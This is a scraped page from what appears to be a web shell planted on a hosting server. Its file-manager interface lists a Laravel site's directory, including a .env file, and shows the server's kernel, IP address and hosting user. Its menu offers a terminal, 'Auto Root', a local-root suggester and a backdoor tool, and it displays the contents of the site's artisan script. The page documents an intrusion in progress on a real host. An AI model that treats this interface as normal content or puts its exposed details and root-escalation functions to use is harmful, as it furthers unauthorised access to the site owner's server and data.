Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
oishifashion /
ap.tsgbd.com /
Delete
Unzip
Name
Size
Permission
Date
Action
Modules
[ DIR ]
drwxr-xr-x
2025-12-19 06:08
aa
[ DIR ]
drwxr-xr-x
2025-12-19 06:05
app
[ DIR ]
drwxr-xr-x
2025-12-16 01:59
bootstrap
[ DIR ]
drwxr-xr-x
2025-12-16 01:59
config
[ DIR ]
drwxr-xr-x
2025-12-16 01:59
database
[ DIR ]
drwxr-xr-x
2025-12-16 01:59
lang
[ DIR ]
drwxr-xr-x
2025-12-16 02:00
public
[ DIR ]
drwxr-xr-x
2025-12-16 02:00
resources
[ DIR ]
drwxr-xr-x
2025-12-16 02:00
routes
[ DIR ]
drwxr-xr-x
2025-12-16 02:00
storage
[ DIR ]
drwxr-xr-x
2025-12-16 01:59
tests
[ DIR ]
drwxr-xr-x
2025-12-16 01:59
vendor
[ DIR ]
drwxr-xr-x
2025-12-16 02:00
.env
2.32
KB
-rw-r--r--
2025-12-19 06:06
.env.example
2.25
KB
-rw-r--r--
2025-12-16 01:59
.gitattributes
111
B
-rw-r--r--
2025-12-16 01:59
.gitignore
462
B
-rw-r--r--
2025-12-16 01:59
.htaccess
95
B
-rw-r--r--
2025-12-16 01:59
.php_cs
470
B
-rw-r--r--
2025-12-16 01:59
.prettierrc
98
B
-rw-r--r--
2025-12-16 01:59
.shift
131
B
-rw-r--r--
2025-12-16 01:59
artisan
1.65
KB
-rw-r--r--
2025-12-16 01:59
composer.json
3.45
KB
-rw-r--r--
2025-12-16 01:59
composer.lock
488.76
KB
-rw-r--r--
2025-12-16 01:59
modules_statuses.json
502
B
-rw-r--r--
2025-12-16 01:59
phpunit.xml
1.15
KB
-rw-r--r--
2025-12-16 01:59
readme.md
757
B
-rw-r--r--
2025-12-16 01:59
readme.pdf
19.33
KB
-rw-r--r--
2025-12-16 01:59
Save
Rename
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any of our classes manually. It's great to relax. | */ require __DIR__ . '/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);